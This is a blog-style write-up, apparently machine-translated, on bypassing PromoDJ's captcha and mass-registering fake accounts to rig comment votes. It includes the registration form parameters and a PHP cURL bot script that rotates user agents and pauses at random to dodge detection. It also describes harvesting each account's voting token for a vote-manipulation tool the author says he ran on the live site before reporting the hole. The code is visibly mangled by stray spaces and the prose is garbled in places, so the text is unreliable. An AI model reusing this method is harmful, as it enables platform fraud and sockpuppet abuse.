Using PromoDJ for Equity

Good day. I want to share a story that happened to me just yesterday, but about everything in order.

Content

  1. Introduction
 2. Possible activities
	 2.1.  Cheating the value of the promos
	 2.2.  Spam
	 2.3.  Vote for comments
 3. Methods of implementation
 4. Preparation for registration of accounts
	 4.1.  basic information
	 4.2.  Captcha
	 4.3.  E-mail Addresses
	 4.4.  Constants
 5. Scripts and their work
	 5.1.  Account Registrar
	 5.2.  Authorizer
	 5.3.  Get user signatures
	 5.4.  Shell for working with user signatures
 6. Conclusion
	 6.1.  Work results
	 6.2.  PromoDJ Administration Reaction
	 6.3.  The last word
 7. Toolkit 

Introduction

I think many of you know about the existence of the PromoDJ portal (abbreviated as PDJ), who do not know him - that's okay, now I will explain everything. The site is a social network for musicians and DJs, photographers and singers, and there are many more for whom, where each of them can post their material for evaluation, and registered users can rate and discuss this very material. PDJ is a great platform for a beginner music project, so we are registered there.
')
By nature, I am a very curious person, I was always interested to know what and how it works, where there are some security holes and how it can be used, there was free time, therefore PDJ was chosen as an object for study. But before starting the research, I sat down and thought, - And what benefits can be obtained from this?

For myself, I identified several areas:

1. Cheating the values ​​of the promos;
2. Spam;
3. Vote for comments.

I must say that I stopped at the last, but I will describe all the directions.

Possible activities

Cheating the value of the promos

Promo is a personal cool rating, it is used to form a general top of artists, a top in styles and activities. Cheating this value would not have given us anything: the quality of the music will remain the same, the ideology will not add to this, the number of visitors and auditions too, and after the recent innovations on the PDJ, it became theoretically impossible to wind the rating. The fact is that recently, in order to vote for an artist, thereby increasing his promotions, you need to authorize your account, for this you need to specify your mobile number to which the coded code will come.

Spam

Added this activity only to have more points. I do not like spam, and you, I think, also, therefore, I do not consider spamming, and in general I consider that this is the dirtiest and lowest matter.

Vote for comments

PromoDJ is, first of all, a social network, here people are free to express their opinions and attitudes through comments, blog posts and the evaluation of comments.

After I thought about the evaluation of comments, I seemed to look at everything that happens from a different angle. Recently, I began to meet discussions on the PDJ forums, where a particular user unfairly received cons for his comments, not one, not two, but 20 pieces, after which inappropriate users, without reading the discussion text, picked up the baton and continued to put minuses and harmless comment went for -100. After these thoughts, I decided to become Superman, to become Batman and Robin in one person, Jeims Bond with a license to change the rating of comments, a fighter for justice, horror, flying on the wings of the night, bringing retribution in the name of the Moon.

A vivid example of an adequate and perfectly true (from the discussion) comment:
A little later, the same comment:

Ways of implementation

Before you start running around the city in swimming trunks, a mask and a black raincoat, I decided to study how you can realize your plans and which side should approach this. At that time, I knew for sure that the request, to increase or decrease the comment rating, comes without reloading the pages, which means that some javascript library was used, which formed and sent the post, or maybe get, a request to the server PDJ.

Let's look a little closer:
The following parameters are passed in the POST request:


Where, digest is a unique, for each registered user, parameter (in some cases, I will call it a signature), which consists of an id-user and thirty-two character hash; commentID - number of the comment; vote - rating mode, “1” - plus a comment, “-1” - minus a comment.

Next, I ended the user's session on the site and tried to vote for some comment, which, in fact, I succeeded. For me, this meant a lot, now, for example, I knew that I would not have to log in to the site to give a vote for this or that comment, everything was done in one request with three parameters.

All the necessary knowledge was obtained, but there was a question about digest - unique user identifiers, voices were not passed on invalid signatures, and with the help of one signature you can vote for the selected comment only once. The only way out that I found was to register a few dummies for using their signatures for voting.

Preparation for registration of accounts

basic information

The registration page, on PromoDJ, looks very massive, all sorts of items, input elements, select boxes and checkboxes. Empirically, I quickly determined which parameters to pass to successfully register, they turned out to be:

$ postfiends = array (
"row [login]" => "" , // login
"row [password1]" => "" , // password
"row [password2]" => "" , // password, again
"row [email]" => "" , // e-mail
"row [i]" => "" , // name
"row [f]" => "" , // last name
"row [sex]" => "" , // gender, can be man or woman
"row [iam_clubber]" => "1" , // status: clubber
"row [iam_listener]" => "1" , // status: listener
"crow [company_kind]" => "none" , // no, I do not represent the company

"crow [title]" => "" , // name of organization
"crow [countryID]" => "3159" , // country code
"crow [regionID]" => "0" , // region code (not specified)
"crow [cityID]" => "0" , // city code (not specified)
"crow [metroID]" => "0" // subway station code (not specified)
"crow [street]" => "" , // street, house
"crow [tel]" => "" , // contact phone
"crow [fax]" => "" , // fax
"crow [www]" => "" , // site

"row [styleID]" => "" , // I like the style most (code from the list)
"row [nick]" => "" , // nickname
"row [title]" => "" , // address of the page on promodj.ru
"row [about]" => "" , // about yourself
"row [icq]" => "" , // icq
"row [skype]" => "" , // skype
"row [countryID]" => "3159" , // country code
"row [regionID]" => "0" , // region code (not specified)
"row [cityID]" => "0" , // city code (not specified)
"row [metroID]" => "0" , // metro station code (not specified)
"row [invite]" => "" , // magic code
"row [agreed]" => "1" , // yes, I agree with the rules of the site
"respond" => "" , // response to captcha
"key" => "" // hash captcha
) ;

The choice of “clubber” and “listener” statuses is not accidental, these statuses do not require confirmation from the administration, and this attention has nothing to do with. For example, in order to go through the confirmation of the “musician” status, it is necessary to write in detail about their activities, it will be strange if the administration sees requests following each other with the same description.

Captcha

Going to the end of the questionnaire, the last item, we find the captcha, which meanly bends the text, making it difficult to static definition:

As I wrote above, in the request for registration, it is not only the response to the captcha that is transmitted as the hash itself. The same hash is used to generate the image:
pdj.ru/captcha_big.gif?key=0ad241a541a4f2e8a7457138b6c2299e

The hash is unique and you can register it only once, changing the hash leads to a change in the text in the picture. Visually, I couldn’t manage to determine the algorithm for which I can get an answer to the captcha from the hash, so I suggested three further development steps:

1. Create a table consisting of a valid pair (hash + answer);
2. Attempt to determine the algorithm for obtaining from the hash response;
3. Search for the implementation of this type of captcha recognition.

Create a table consisting of a valid pair (hash + answer): very long and tedious, plus you have to write an additional script, this option can be considered only if there are volunteers to work.

Trying to determine the algorithm for obtaining from the hash the answer: quite difficult to implement, or even impossible, because it can be used some kind of hashing algorithm, and even using salt. Not an option.

Search for the implementation of the captcha of this type: never worked and did not use such libraries, this option can be used.

While I was arguing on this topic, I accidentally discovered that if the hash is less than 32 characters, then the picture will be with four zeros, having determined this, I just need to check whether the stub is worth this case for PDJ or not. To do this, in the page code, I changed the necessary parameters and successfully registered a new account.

E-mail Addresses

I decided not to search for electronic mailboxes, not to write them myself and not to search for those who sell databases, not to send Trojans to friends and acquaintances, why? Yandex will do everything for us.

Constants

Almost everything is ready for registration of accounts, it remains to collect the missing data, namely:

1. List of names to register;
2. Music style codes;
3. A small user-agents-list.

As a list of names, I used a large database of nicks found on the Internet. Other data:

$ uagents = array (
"Opera / 9.20 (Windows NT 6.0; U; en)" ,
"Mozilla / 4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50" ,
"Mozilla / 4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.02 [en]" ,
"Mozilla / 5.0 (Windows; U; Windows NT 5.1; en-US; rv: 1.7.5) Gecko / 20060127 Netscape / 8.1" ,
"Mozilla / 5.0 (X11; U; Linux i686; en-US; rv: 1.8.1.1) Gecko / 20061205 Iceweasel / 2.0.0.1 (Debian-2.0.0.1 + dfsg-2)" ,
"Opera / 10.00 (X11; Linux i686; U; en) Presto / 2.2.0" ) ;

$ styles = explode ( ";" , "88; 2; 4; 7; 6; 14; 31; 15; 18; 23; 25; 27; 28; 8; 24; 29; 30; 44; 46; 47; 49; 37; 1; 80; 16 " ) ;

Scripts and their work

Account Registrar

set_time_limit ( 0 ) ;
$ magic = 0 ;
$ i = 1 ;

$ fp = fopen ( 'names.txt' , 'rb' ) ;
while ( ( $ line = @ fgets ( $ fp ) ) ! == false ) {
// $ pdgparams = "";
$ postfiends [ "row [login]" ] = $ postfiends [ "row [password1]" ] = $ postfiends [ "row [password2]" ] = $ postfiends [ "row [nick]" ] = $ postfiends [ "row [ title] " ] = trim ( $ line ) ;
$ postfiends [ "row [email]" ] = $ postfiends [ "row [login]" ] . "@ asdfghhgj.ru" ;
$ postfiends [ "row [sex]" ] = ( rand ( 0 , 1 ) ? "man" : "woman" ) ;
$ postfiends [ "row [styleID]" ] = $ styles [ rand ( 0 , sizeof ( $ styles ) - 1 ) ] ;
$ postfiends [ "key" ] = $ magic + $ i ;

// foreach ($ postfiends as $ key_name => $ key_value)
// $ pdgparams. = '&'. $ key_name. '='. $ key_value;

$ ci = curl_init ( ) ;
curl_setopt ( $ ci , CURLOPT_USERAGENT , $ uagents [ rand ( 0 , sizeof ( $ uagents ) - 1 ) ] ) ;
curl_setopt ( $ ci , CURLOPT_CONNECTTIMEOUT , 30 ) ;
curl_setopt ( $ ci , CURLOPT_TIMEOUT , 30 ) ;
curl_setopt ( $ ci , CURLOPT_RETURNTRANSFER , TRUE ) ;
curl_setopt ( $ ci , CURLOPT_POST , TRUE ) ;
curl_setopt ( $ ci , CURLOPT_POSTFIELDS , $ postfiends ) ;
curl_setopt ( $ ci , CURLOPT_URL , "pdj.ru/register/" ) ;
curl_exec ( $ ci ) ;
curl_close ( $ ci ) ;

$ i ++;
sleep ( rand ( 5 , 25 ) ) ;
}

While the script is running, notifications of successful registration come:

Authorizer

In order not to arouse any suspicions at all and not to say goodbye in a moment to all the accounts, I decided to authorize everyone. To do this, I exported all the letters from the email client, then pulled links from them and got a list of a huge number of records.

Get user signatures

The process of obtaining a signature consisted of several steps:

1. User authorization through the form on the login page;
2. Go to PromoDJ home page;
3. Extract the digest parameter from the page code.

This process took about two and a half - three hours, but there is a plus in this - I was never banned, I did not receive notifications from the administration about any violations and none of the accounts, for all the time, were deleted.

Shell for working with user signatures

To vote for comments, I made a convenient shell, where I could indicate the address of a comment and what to do with it - put a plus or a minus.


On the settings page, you can specify the operation mode:

In the automatic mode, after clicking on the “Run” button, all available hashes are voted for the specified comment. In manual mode, you can choose from the list any hash you like and vote on it:

Conclusion

Work results

Randomized goodness and love was sown throughout PromoDJ.

PromoDJ Administration Reaction

After I sent a letter to the technical support of the portal, I could not even think that everything would end up being presented with a premium account and branding for their curiosity, which will come in very handy to our music project.

The last word

The described vulnerability, due to which the registration of accounts was made, is closed a few minutes after my letter.

Thank you for reading to the very end. Good luck and see you in new articles!

Tools

In the process of work were used:

• phpDesigner
• jQuery